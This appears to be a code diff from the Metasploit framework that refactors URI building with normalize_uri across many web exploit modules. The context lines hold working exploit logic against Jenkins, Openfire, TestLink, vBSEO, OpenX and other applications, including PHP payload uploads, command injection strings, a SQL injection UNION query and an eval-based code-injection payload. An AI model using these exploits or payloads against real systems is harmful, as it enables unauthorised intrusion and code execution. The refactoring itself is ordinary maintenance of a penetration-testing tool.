|
||||
def http_send_command(cmd, opts = {})
|
||||
request_parameters = {
|
||||
'method' => 'POST',
|
||||
'uri' => "#{@uri.path}script",
|
||||
'uri' => normalize_uri(@uri.path, "script"),
|
||||
'vars_post' =>
|
||||
{
|
||||
'script' => java_craft_runtime_exec(cmd),
|
||||
@ -150,7 +150,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||
print_status('Logging in...')
|
||||
res = send_request_cgi({
|
||||
'method' => 'POST',
|
||||
'uri' => "#{@uri.path}j_acegi_security_check",
|
||||
'uri' => normalize_uri(@uri.path, "j_acegi_security_check"),
|
||||
'vars_post' =>
|
||||
{
|
||||
'j_username' => Rex::Text.uri_encode(datastore['USERNAME'], 'hex-normal'),
|
||||
|
@ -66,7 +66,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||
|
||||
res = send_request_raw({
|
||||
'method' => 'GET',
|
||||
'uri' => "#{uri}admin/libraries/ajaxfilemanager/ajax_create_folder.php"
|
||||
'uri' => normalize_uri(uri, "admin/libraries/ajaxfilemanager/ajax_create_folder.php")
|
||||
})
|
||||
|
||||
if res and res.code == 200
|
||||
@ -87,14 +87,14 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||
print_status("#{peer} - Sending PHP payload (#{php.length.to_s} bytes)")
|
||||
send_request_cgi({
|
||||
'method' => 'POST',
|
||||
'uri' => "#{uri}admin/libraries/ajaxfilemanager/ajax_create_folder.php",
|
||||
'uri' => normalize_uri(uri, "admin/libraries/ajaxfilemanager/ajax_create_folder.php"),
|
||||
'data' => php
|
||||
})
|
||||
|
||||
print_status("#{peer} - Requesting data.php")
|
||||
send_request_raw({
|
||||
'method' => 'GET',
|
||||
'uri' => "#{uri}admin/libraries/ajaxfilemanager/inc/data.php"
|
||||
'uri' => normalize_uri(uri, 'admin/libraries/ajaxfilemanager/inc/data.php')
|
||||
})
|
||||
|
||||
handler
|
||||
|
@ -64,7 +64,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||
uri << '/' if uri[-1,1] != '/'
|
||||
base = File.dirname("#{uri}.")
|
||||
|
||||
res = send_request_raw({'uri'=>"#{base}/index.php"})
|
||||
res = send_request_raw({'uri'=>normalize_uri(uri, "/index.php")})
|
||||
if res and res.body =~ /MobileCartly/
|
||||
return Exploit::CheckCode::Detected
|
||||
else
|
||||
@ -93,7 +93,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||
#
|
||||
print_status("#{@peer} - Uploading payload")
|
||||
res = send_request_cgi({
|
||||
'uri' => "#{base}/includes/savepage.php",
|
||||
'uri' => normalize_uri(base, "/includes/savepage.php"),
|
||||
'vars_get' => {
|
||||
'savepage' => php_fname,
|
||||
'pagecontent' => get_write_exec_payload(:unlink_self=>true)
|
||||
@ -109,7 +109,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||
# Run payload
|
||||
#
|
||||
print_status("#{@peer} - Requesting '#{php_fname}'")
|
||||
send_request_cgi({ 'uri' => "#{base}/pages/#{php_fname}" })
|
||||
send_request_cgi({ 'uri' => normalize_uri(base, pages, php_fname) })
|
||||
|
||||
handler
|
||||
end
|
||||
|
@ -98,7 +98,7 @@ class Metasploit4 < Msf::Exploit::Remote
|
||||
end
|
||||
|
||||
def http_send_raw(cmd)
|
||||
path = normalize_uri(target_uri.path) + '/mt-upgrade.cgi'
|
||||
path = normalize_uri(target_uri.path, '/mt-upgrade.cgi')
|
||||
pay = cmd.gsub('\\', '\\\\').gsub('"', '\"')
|
||||
send_request_cgi(
|
||||
{
|
||||
|
@ -89,10 +89,10 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||
end
|
||||
|
||||
def check
|
||||
base = normalize_uri(target_uri.path)
|
||||
base = target_uri.path
|
||||
base << '/' if base[-1, 1] != '/'
|
||||
|
||||
path = "#{base}login.jsp"
|
||||
path = normalize_uri(base, "login.jsp")
|
||||
res = send_request_cgi(
|
||||
{
|
||||
'uri' => path
|
||||
@ -183,7 +183,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||
data << "\r\n--#{boundary}--"
|
||||
|
||||
res = send_request_cgi({
|
||||
'uri' => "#{base}setup/setup-/../../plugin-admin.jsp?uploadplugin",
|
||||
'uri' => normalize_uri(base, "setup/setup-/../../plugin-admin.jsp?uploadplugin"),
|
||||
'method' => 'POST',
|
||||
'data' => data,
|
||||
'headers' =>
|
||||
@ -201,7 +201,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||
if datastore['REMOVE_PLUGIN']
|
||||
print_status("Deleting plugin #{plugin_name} from the server")
|
||||
res = send_request_cgi({
|
||||
'uri' => "#{base}setup/setup-/../../plugin-admin.jsp?deleteplugin=#{plugin_name.downcase}",
|
||||
'uri' => normalize_uri(base, "setup/setup-/../../plugin-admin.jsp?deleteplugin=") + plugin_name.downcase,
|
||||
'headers' =>
|
||||
{
|
||||
'Cookie' => "JSESSIONID=#{rand_text_numeric(13)}",
|
||||
|
@ -252,7 +252,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||
print_status("Trying file: #{f}")
|
||||
send_request_raw({
|
||||
'method' => 'GET',
|
||||
'uri' => "#{base}mods/documents/uploads/#{f}",
|
||||
'uri' => normalize_uri(base, 'mods/documents/uploads/', f),
|
||||
'cookie' => cookie
|
||||
})
|
||||
end
|
||||
|
@ -56,9 +56,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||
end
|
||||
|
||||
def check
|
||||
uri = normalize_uri(datastore['URI'])
|
||||
uri << '/' if uri[-1,1] != '/'
|
||||
uri << 'index.php'
|
||||
uri = normalize_uri(datastore['URI'], 'index.php')
|
||||
|
||||
res = send_request_raw(
|
||||
{
|
||||
@ -74,9 +72,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||
end
|
||||
|
||||
def get_session
|
||||
uri normalize_uri(datastore['URI'])
|
||||
uri << '/' if uri[-1,1] != '/'
|
||||
uri << 'index.php'
|
||||
uri = normalize_uri(datastore['URI'], 'index.php')
|
||||
|
||||
res = send_request_raw(
|
||||
{
|
||||
|
@ -73,13 +73,12 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||
|
||||
|
||||
def exploit
|
||||
uri = normalize_uri(target_uri.path)
|
||||
uri << '/' if uri[-1,1] != '/'
|
||||
uri = target_uri.path
|
||||
|
||||
print_status("#{rhost}#{rport} - Sending request...")
|
||||
res = send_request_cgi({
|
||||
'method' => 'GET',
|
||||
'uri' => "#{uri}drawimage.php",
|
||||
'uri' => normalize_uri(uri, "drawimage.php"),
|
||||
'vars_get' => {
|
||||
'pdf' => 'make',
|
||||
'pfilez' => "xxx; #{payload.encoded}"
|
||||
|
@ -61,9 +61,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||
end
|
||||
|
||||
def check
|
||||
uri = normalize_uri(datastore['URI'])
|
||||
uri << '/' if uri[-1,1] != '/'
|
||||
uri << 'p_/webdav/xmltools/minidom/xml/sax/saxutils/os/popen2'
|
||||
uri = normalize_uri(datastore['URI'], 'p_/webdav/xmltools/minidom/xml/sax/saxutils/os/popen2')
|
||||
|
||||
res = send_request_raw(
|
||||
{
|
||||
@ -77,9 +75,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||
end
|
||||
|
||||
def exploit
|
||||
uri = normalize_uri(datastore['URI'])
|
||||
uri << '/' if uri[-1,1] != '/'
|
||||
uri << 'p_/webdav/xmltools/minidom/xml/sax/saxutils/os/popen2'
|
||||
uri = normalize_uri(datastore['URI'], 'p_/webdav/xmltools/minidom/xml/sax/saxutils/os/popen2')
|
||||
|
||||
send_request_cgi(
|
||||
{
|
||||
|
@ -73,8 +73,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||
header = rand_text_alpha_upper(3)
|
||||
header_append = rand_text_alpha_upper(4)
|
||||
|
||||
uri = normalize_uri(datastore['URI'])
|
||||
uri += (datastore['URI'][-1, 1] == "/") ? 'pmwiki.php' : '/pmwiki.php'
|
||||
uri = normalize_uri(datastore['URI'], "pmwiki.php")
|
||||
|
||||
res = send_request_cgi({
|
||||
'method' => 'POST',
|
||||
|
@ -65,7 +65,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||
uri << '/' if uri[-1,1] != '/'
|
||||
base = File.dirname("#{uri}.")
|
||||
|
||||
res = send_request_raw({'uri'=>"#{base}/index.php"})
|
||||
res = send_request_raw({'uri'=>normalize_uri(base, "/index.php")})
|
||||
if res and res.body =~ /<div id\=\"footer\"\>.+qdPM ([\d])\.([\d]).+\<\/div\>/m
|
||||
major, minor = $1, $2
|
||||
return Exploit::CheckCode::Vulnerable if (major+minor).to_i <= 70
|
||||
@ -112,7 +112,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||
# Login
|
||||
res = send_request_cgi({
|
||||
'method' => 'POST',
|
||||
'uri' => "#{base}/index.php/home/login",
|
||||
'uri' => normalize_uri("#{base}/index.php/home/login"),
|
||||
'vars_post' => {
|
||||
'login[email]' => username,
|
||||
'login[password]' => password,
|
||||
@ -187,7 +187,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||
|
||||
res = send_request_cgi({
|
||||
'method' => 'POST',
|
||||
'uri' => "#{base}/index.php/home/myAccount",
|
||||
'uri' => normalize_uri("#{base}/index.php/home/myAccount"),
|
||||
'ctype' => "multipart/form-data; boundary=#{data.bound}",
|
||||
'data' => post_data,
|
||||
'cookie' => cookie,
|
||||
@ -205,7 +205,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||
|
||||
# When we upload a file, it will be renamed. The 'myAccount' page has that info.
|
||||
res = send_request_cgi({
|
||||
'uri' => "#{base}/index.php/home/myAccount",
|
||||
'uri' => normalize_uri("#{base}/index.php/home/myAccount"),
|
||||
'cookie' => cookie
|
||||
})
|
||||
|
||||
|
@ -64,12 +64,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||
|
||||
def check
|
||||
|
||||
uri = normalize_uri(datastore['URI'])
|
||||
if uri[-1,1] != '/'
|
||||
uri = uri + "index.php"
|
||||
else
|
||||
uri = uri + "/index.php"
|
||||
end
|
||||
uri = normalize_uri(datastore['URI'], "index.php")
|
||||
|
||||
res = send_request_raw({
|
||||
'uri' => uri
|
||||
@ -91,12 +86,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||
|
||||
def retrieve_session(user, pass)
|
||||
|
||||
uri = normalize_uri(datastore['URI'])
|
||||
if uri[-1,1] == "/"
|
||||
uri = uri + "login.php"
|
||||
else
|
||||
uri = uri + "/login.php"
|
||||
end
|
||||
uri = normalize_uri(datastore['URI'], "login.php")
|
||||
|
||||
res = send_request_cgi({
|
||||
'uri' => uri,
|
||||
@ -121,12 +111,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||
|
||||
def upload_page(session, newpage, contents)
|
||||
|
||||
uri = normalize_uri(datastore['URI'])
|
||||
if uri[-1,1] == "/"
|
||||
uri = uri + "ftp_upload_file.php"
|
||||
else
|
||||
uri = uri + "/ftp_upload_file.php"
|
||||
end
|
||||
uri = normalize_uri(datastore['URI'], "ftp_upload_file.php")
|
||||
|
||||
boundary = rand_text_alphanumeric(6)
|
||||
|
||||
@ -187,12 +172,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||
def cmd_shell(cmdpath)
|
||||
print_status("Calling payload: #{cmdpath}")
|
||||
|
||||
uri = normalize_uri(datastore['URI'])
|
||||
if uri[-1,1] == "/"
|
||||
uri = uri + cmdpath
|
||||
else
|
||||
uri = uri + "/#{cmdpath}"
|
||||
end
|
||||
uri = normalize_uri(datastore['URI'], cmdpath)
|
||||
|
||||
send_request_raw({
|
||||
'uri' => uri
|
||||
|
@ -264,7 +264,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||
print_status("Triggering payload at '#{@uri}#{@jsp_name}.jsp' ...")
|
||||
res = send_request_cgi(
|
||||
{
|
||||
'uri' => "#{@uri}appliance/#{@jsp_name}.jsp",
|
||||
'uri' => normalize_uri("#{@uri}appliance/#{@jsp_name}.jsp"),
|
||||
'method' => 'GET'
|
||||
})
|
||||
|
||||
|
@ -59,7 +59,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||
|
||||
def check
|
||||
|
||||
base = normalize_uri(target_uri.path)
|
||||
base = target_uri.path
|
||||
base << '/' if base[-1, 1] != '/'
|
||||
peer = "#{rhost}:#{rport}"
|
||||
|
||||
@ -67,7 +67,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||
begin
|
||||
res = send_request_cgi({
|
||||
'method' => 'GET',
|
||||
'uri' => "#{base}login.php"
|
||||
'uri' => normalize_uri(base, "login.php")
|
||||
})
|
||||
|
||||
return Exploit::CheckCode::Unknown if res.nil?
|
||||
@ -185,7 +185,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||
begin
|
||||
res = send_request_cgi({
|
||||
'method' => 'GET',
|
||||
'uri' => "#{base}lib/attachments/attachmentupload.php?id=#{id}&tableName=#{table}",
|
||||
'uri' => normalize_uri(base, "lib/attachments/attachmentupload.php") + "?id=#{id}&tableName=#{table}",
|
||||
'cookie' => datastore['COOKIE'],
|
||||
})
|
||||
if res and res.code == 200
|
||||
@ -221,7 +221,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||
begin
|
||||
res = send_request_cgi({
|
||||
'method' => 'GET',
|
||||
'uri' => "#{base}upload_area/#{table}/#{id}/"
|
||||
'uri' => normalize_uri(base, "upload_area", table, id)
|
||||
})
|
||||
if res and res.code == 200 and res.body =~ /\b([a-f0-9]+)\.php/
|
||||
@token = $1
|
||||
@ -238,11 +238,11 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||
# attempt to retrieve real file name from the database
|
||||
if @token.nil?
|
||||
print_status("#{@peer} - Retrieving real file name from the database.")
|
||||
sqli = "lib/ajax/gettprojectnodes.php?root_node=-1+union+select+file_path,2,3,4,5,6+FROM+attachments+WHERE+file_name='#{fname}'--"
|
||||
sqli = normalize_uri(base, "lib/ajax/gettprojectnodes.php") + "?root_node=-1+union+select+file_path,2,3,4,5,6+FROM+attachments+WHERE+file_name='#{fname}'--"
|
||||
begin
|
||||
res = send_request_cgi({
|
||||
'method' => 'GET',
|
||||
'uri' => "#{base}#{sqli}",
|
||||
'uri' => sqli,
|
||||
'cookie' => datastore['COOKIE'],
|
||||
})
|
||||
if res and res.code == 200 and res.body =~ /\b([a-f0-9]+)\.php/
|
||||
@ -263,7 +263,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||
begin
|
||||
send_request_cgi({
|
||||
'method' => 'GET',
|
||||
'uri' => "#{base}upload_area/nodes_hierarchy/#{id}/#{@token}.php"
|
||||
'uri' => normalize_uri(base, "upload_area", "nodes_hierarchy", id, "#{@token}.php")
|
||||
})
|
||||
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
|
||||
print_error("#{@peer} - Connection failed")
|
||||
|
@ -198,7 +198,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||
#
|
||||
# UPLOAD
|
||||
#
|
||||
path_tmp = normalize_uri(datastore['PATH']) + "/deploy" + query_str
|
||||
path_tmp = normalize_uri(datastore['PATH'], "deploy") + query_str
|
||||
print_status("Uploading #{war.length} bytes as #{app_base}.war ...")
|
||||
res = send_request_cgi({
|
||||
'uri' => path_tmp,
|
||||
@ -247,7 +247,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||
#
|
||||
# DELETE
|
||||
#
|
||||
path_tmp = normalize_uri(datastore['PATH']) + "/undeploy" + query_str
|
||||
path_tmp = normalize_uri(datastore['PATH'], "/undeploy") + query_str
|
||||
print_status("Undeploying #{app_base} ...")
|
||||
res = send_request_cgi({
|
||||
'uri' => path_tmp,
|
||||
@ -263,7 +263,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||
end
|
||||
|
||||
def query_serverinfo()
|
||||
path = normalize_uri(datastore['PATH']) + '/serverinfo'
|
||||
path = normalize_uri(datastore['PATH'], '/serverinfo')
|
||||
res = send_request_raw(
|
||||
{
|
||||
'uri' => path
|
||||
|
@ -58,8 +58,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||
end
|
||||
|
||||
def check
|
||||
uri = normalize_uri(datastore['URI'])
|
||||
uri += (uri[-1, 1] == "/") ? "admincp/login.php" : "/admincp/login.php"
|
||||
uri = normalize_uri(datastore['URI'], "admincp", "login.php")
|
||||
|
||||
res = send_request_raw(
|
||||
{
|
||||
@ -75,8 +74,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||
def exploit
|
||||
p = Rex::Text.encode_base64(payload.encoded)
|
||||
|
||||
uri = normalize_uri(datastore['URI'])
|
||||
uri += (uri[-1, 1] == "/") ? "admincp/plugins.php?newhook" : "/admincp/plugins.php?newhook"
|
||||
uri = normalize_uri(datastore['URI'], "admincp", "plugins.php") + "?newhook"
|
||||
|
||||
res = send_request_cgi(
|
||||
{
|
||||
@ -92,8 +90,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||
}
|
||||
}, 25)
|
||||
|
||||
uri = normalize_uri(datastore['URI'])
|
||||
uri += (uri[-1, 1] == "/") ? "index.php" : "/index.php"
|
||||
uri = normalize_uri(datastore['URI'], "index.php")
|
||||
|
||||
res = send_request_cgi(
|
||||
{
|
||||
|
@ -55,9 +55,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||
flag = rand_text_alpha(rand(10)+10)
|
||||
data = "char_repl='{${print(#{flag})}}'=>"
|
||||
|
||||
uri = normalize_uri(datastore['URI'])
|
||||
uri << '/' if uri[-1,1] != '/'
|
||||
uri << 'vbseocp.php'
|
||||
uri = normalize_uri(datastore['URI'], 'vbseocp.php')
|
||||
|
||||
response = send_request_cgi({
|
||||
'method' => "POST",
|
||||
@ -82,9 +80,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||
|
||||
data = "char_repl='{${eval(base64_decode($_SERVER[HTTP_CODE]))}}.{${die()}}'=>"
|
||||
|
||||
uri = normalize_uri(datastore['URI'])
|
||||
uri << '/' if uri[-1,1] != '/'
|
||||
uri << 'vbseocp.php'
|
||||
uri = normalize_uri(datastore['URI'], 'vbseocp.php')
|
||||
|
||||
response = send_request_cgi({
|
||||
'method' => 'POST',
|
||||
|
@ -63,8 +63,8 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||
uri << '/' if uri[-1,1] != '/'
|
||||
base = File.dirname("#{uri}.")
|
||||
|
||||
res1 = send_request_raw({'uri'=>"#{base}/index.php"})
|
||||
res2 = send_request_raw({'uri'=>"#{base}/work/resultimage.php"})
|
||||
res1 = send_request_raw({'uri'=>normalize_uri("#{base}/index.php")})
|
||||
res2 = send_request_raw({'uri'=>normalize_uri("#{base}/work/resultimage.php")})
|
||||
|
||||
if res1 and res1.body =~ /WebPagetest \- Website Performance and Optimization Test/ and
|
||||
res2 and res2.code == 200
|
||||
@ -111,7 +111,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||
print_status("#{peer} - Uploading payload (#{p.length.to_s} bytes)...")
|
||||
res = send_request_cgi({
|
||||
'method' => 'POST',
|
||||
'uri' => "#{base}/work/resultimage.php",
|
||||
'uri' => normalize_uri("#{base}/work/resultimage.php"),
|
||||
'ctype' => "multipart/form-data; boundary=#{data.bound}",
|
||||
'data' => data.to_s
|
||||
})
|
||||
@ -121,7 +121,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||
return
|
||||
end
|
||||
|
||||
@target_path = "#{base}/results/#{fname}"
|
||||
@target_path = normalize_uri("#{base}/results/#{fname}")
|
||||
print_status("#{peer} - Requesting #{@target_path}")
|
||||
res = send_request_cgi({'uri'=>@target_path})
|
||||
|
||||
|
@ -87,7 +87,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||
def get_cookie
|
||||
res = send_request_raw({
|
||||
'method' => 'GET',
|
||||
'uri' => "#{@base}wikka.php"
|
||||
'uri' => normalize_uri(@base, "wikka.php")
|
||||
})
|
||||
|
||||
# Get the cookie in this format:
|
||||
@ -107,7 +107,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||
#
|
||||
def login(cookie)
|
||||
# Send a request to the login page so we can obtain some hidden values needed for login
|
||||
uri = "#{@base}wikka.php?wakka=UserSettings"
|
||||
uri = normalize_uri(@base, "wikka.php") + "?wakka=UserSettings"
|
||||
res = send_request_raw({
|
||||
'method' => 'GET',
|
||||
'uri' => uri,
|
||||
@ -163,7 +163,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||
# Get the necessary fields in order to post a comment
|
||||
res = send_request_raw({
|
||||
'method' => 'GET',
|
||||
'uri' => "#{@base}wikka.php?wakka=#{datastore['PAGE']}&show_comments=1",
|
||||
'uri' => normalize_uri(@base, "wikka.php") + "?wakka=#{datastore['PAGE']}&show_comments=1",
|
||||
'cookie' => cookie
|
||||
})
|
||||
|
||||
@ -189,11 +189,11 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||
# Inject payload
|
||||
b64_payload = Rex::Text.encode_base64(payload.encoded)
|
||||
port = (rport.to_i == 80) ? "" : ":#{rport}"
|
||||
uri = "#{@base}wikka.php?wakka=#{datastore['PAGE']}/addcomment"
|
||||
uri = normalize_uri("#{@base}wikka.php?wakka=#{datastore['PAGE']}/addcomment")
|
||||
post_data = ""
|
||||
send_request_cgi({
|
||||
'method' => 'POST',
|
||||
'uri' => "#{@base}wikka.php?wakka=#{datastore['PAGE']}/addcomment",
|
||||
'uri' => uri,
|
||||
'cookie' => cookie,
|
||||
'headers' => { 'Referer' => "http://#{rhost}:#{port}/#{uri}" },
|
||||
'vars_post' => fields,
|
||||
@ -202,7 +202,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||
|
||||
send_request_raw({
|
||||
'method' => 'GET',
|
||||
'uri' => "#{@base}spamlog.txt.php"
|
||||
'uri' => normalize_uri(@base, "spamlog.txt.php")
|
||||
})
|
||||
end
|
||||
|
||||
|
@ -61,12 +61,11 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||
|
||||
def check
|
||||
base = normalize_uri(target_uri.path)
|
||||
base << '/' if base[-1, 1] != '/'
|
||||
|
||||
sig = rand_text_alpha(10)
|
||||
|
||||
res = send_request_cgi({
|
||||
'uri' => "/#{base}/Config/diff.php",
|
||||
'uri' => normalize_uri("/#{base}/Config/diff.php"),
|
||||
'vars_get' => {
|
||||
'file' => sig,
|
||||
'new' => '1',
|
||||
@ -86,10 +85,9 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||
print_status("Sending GET request...")
|
||||
|
||||
base = normalize_uri(target_uri.path)
|
||||
base << '/' if base[-1, 1] != '/'
|
||||
|
||||
res = send_request_cgi({
|
||||
'uri' => "/#{base}/Config/diff.php",
|
||||
'uri' => normalize_uri("/#{base}/Config/diff.php"),
|
||||
'vars_get' => {
|
||||
'file' => "&#{payload.encoded} #",
|
||||
'new' => '1',
|
||||
|
@ -71,7 +71,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||
|
||||
def check
|
||||
res = send_request_raw({
|
||||
'uri' => normalize_uri(datastore['URI']) + '/picEditor.php'
|
||||
'uri' => normalize_uri(datastore['URI'], '/picEditor.php')
|
||||
}, 25)
|
||||
|
||||
if (res and res.body =~ /Coppermine Picture Editor/i)
|
||||
@ -98,7 +98,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||
|
||||
res = send_request_cgi({
|
||||
'method' => 'POST',
|
||||
'uri' => normalize_uri(datastore['URI']) + "/picEditor.php",
|
||||
'uri' => normalize_uri(datastore['URI'], "/picEditor.php"),
|
||||
'vars_post' =>
|
||||
{
|
||||
'angle' => angle,
|
||||
|
@ -58,12 +58,11 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||
end
|
||||
|
||||
def check
|
||||
uri = normalize_uri(target_uri.path)
|
||||
uri << '/' if uri[-1,1] != '/'
|
||||
uri = target_uri.path
|
||||
|
||||
res = send_request_cgi({
|
||||
'method' => 'GET',
|
||||
'uri' => "#{uri}egallery/uploadify.php"
|
||||
'uri' => normalize_uri(uri, "egallery", "uploadify.php")
|
||||
})
|
||||
|
||||
if res and res.code == 200 and res.body.empty?
|
||||
@ -97,7 +96,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||
print_status("#{peer} - Sending PHP payload (#{payload_name})")
|
||||
res = send_request_cgi({
|
||||
'method' => 'POST',
|
||||
'uri' => "#{uri}egallery/uploadify.php",
|
||||
'uri' => normalize_uri("#{uri}egallery/uploadify.php"),
|
||||
'ctype' => "multipart/form-data; boundary=#{boundary}",
|
||||
'data' => post_data
|
||||
})
|
||||
@ -113,7 +112,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||
# Execute our payload
|
||||
res = send_request_cgi({
|
||||
'method' => 'GET',
|
||||
'uri' => "#{uri}#{payload_name}"
|
||||
'uri' => normalize_uri("#{uri}#{payload_name}")
|
||||
})
|
||||
|
||||
# If we don't get a 200 when we request our malicious payload, we suspect
|
||||
|
@ -54,9 +54,8 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||
end
|
||||
|
||||
def check
|
||||
uri = normalize_uri(datastore['URI'])
|
||||
uri << '/' if uri[-1,1] != '/'
|
||||
uri << 'plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/upload.php?type=file&folder='
|
||||
uri = normalize_uri(datastore['URI'], 'plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/upload.php')
|
||||
uri << '?type=file&folder='
|
||||
res = send_request_raw(
|
||||
{
|
||||
'uri' => uri
|
||||
|
@ -68,9 +68,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||
end
|
||||
|
||||
def check
|
||||
uri = normalize_uri(datastore['URI'])
|
||||
uri << '/' if uri[-1,1] != '/'
|
||||
uri << 'www/admin/'
|
||||
uri = normalize_uri(datastore['URI'], 'www', 'admin/')
|
||||
res = send_request_raw(
|
||||
{
|
||||
'uri' => uri
|
||||
@ -108,9 +106,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||
|
||||
# Static files
|
||||
img_dir = 'images/'
|
||||
uri_base = normalize_uri(datastore['URI'])
|
||||
uri_base << '/' if uri_base[-1,1] != '/'
|
||||
uri_base << 'www/'
|
||||
uri_base = normalize_uri(datastore['URI'], 'www/')
|
||||
|
||||
# Need to login first :-/
|
||||
cookie = openx_login(uri_base)
|
||||
@ -166,7 +162,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||
|
||||
res = send_request_raw(
|
||||
{
|
||||
'uri' => uri_base + 'admin/index.php'
|
||||
'uri' => normalize_uri(uri_base, 'admin/index.php')
|
||||
}, 10)
|
||||
if not (res and res.body =~ /oa_cookiecheck\" value=\"([^\"]+)\"/)
|
||||
return nil
|
||||
@ -176,7 +172,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||
res = send_request_cgi(
|
||||
{
|
||||
'method' => 'POST',
|
||||
'uri' => uri_base + 'admin/index.php',
|
||||
'uri' => normalize_uri(uri_base, 'admin/index.php'),
|
||||
'vars_post' =>
|
||||
{
|
||||
'oa_cookiecheck' => cookie,
|
||||
@ -201,7 +197,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||
def openx_find_campaign(uri_base, cookie)
|
||||
res = send_request_raw(
|
||||
{
|
||||
'uri' => uri_base + 'admin/advertiser-campaigns.php',
|
||||
'uri' => normalize_uri(uri_base, 'admin/advertiser-campaigns.php'),
|
||||
'headers' =>
|
||||
{
|
||||
'Cookie' => "sessionID=#{cookie}; PHPSESSID=#{cookie}",
|
||||
@ -269,7 +265,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||
|
||||
res = send_request_raw(
|
||||
{
|
||||
'uri' => uri_base + "admin/banner-edit.php",
|
||||
'uri' => normalize_uri(uri_base, "admin/banner-edit.php"),
|
||||
'method' => 'POST',
|
||||
'data' => data,
|
||||
'headers' =>
|
||||
@ -287,7 +283,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||
# Ugh, now we have to get the banner id!
|
||||
res = send_request_raw(
|
||||
{
|
||||
'uri' => uri_base + "admin/campaign-banners.php?clientid=#{adv_id}&campaignid=#{camp_id}",
|
||||
'uri' => normalize_uri(uri_base, "admin/campaign-banners.php") + "?clientid=#{adv_id}&campaignid=#{camp_id}",
|
||||
'method' => 'GET',
|
||||
'headers' =>
|
||||
{
|
||||
@ -319,7 +315,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||
# Ugh, now we have to get the banner name too!
|
||||
res = send_request_raw(
|
||||
{
|
||||
'uri' => uri_base + "admin/banner-edit.php?clientid=#{adv_id}&campaignid=#{camp_id}&bannerid=#{ban_id}",
|
||||
'uri' => normalize_uri(uri_base, "admin/banner-edit.php") + "?clientid=#{adv_id}&campaignid=#{camp_id}&bannerid=#{ban_id}",
|
||||
'method' => 'GET',
|
||||
'headers' =>
|
||||
{
|
||||
@ -338,7 +334,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||
def openx_banner_delete(uri_base, cookie, adv_id, camp_id, ban_id)
|
||||
res = send_request_raw(
|
||||
{
|
||||
'uri' => uri_base + "admin/banner-delete.php?clientid=#{adv_id}&campaignid=#{camp_id}&bannerid=#{ban_id}",
|
||||
'uri' => normalize_uri(uri_base, "admin/banner-delete.php") + "?clientid=#{adv_id}&campaignid=#{camp_id}&bannerid=#{ban_id}",
|
||||
'method' => 'GET',
|
||||
'headers' =>
|
||||
{
|
||||
|
@ -78,7 +78,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||
|
||||
print_status("Sending file save request")
|
||||
response = send_request_raw({
|
||||
'uri' => normalize_uri(datastore['URI']) + "/" + "admin/file_manager.php/login.php?action=save",
|
||||
'uri' => normalize_uri(datastore['URI'], "admin/file_manager.php/login.php") + "?action=save",
|
||||
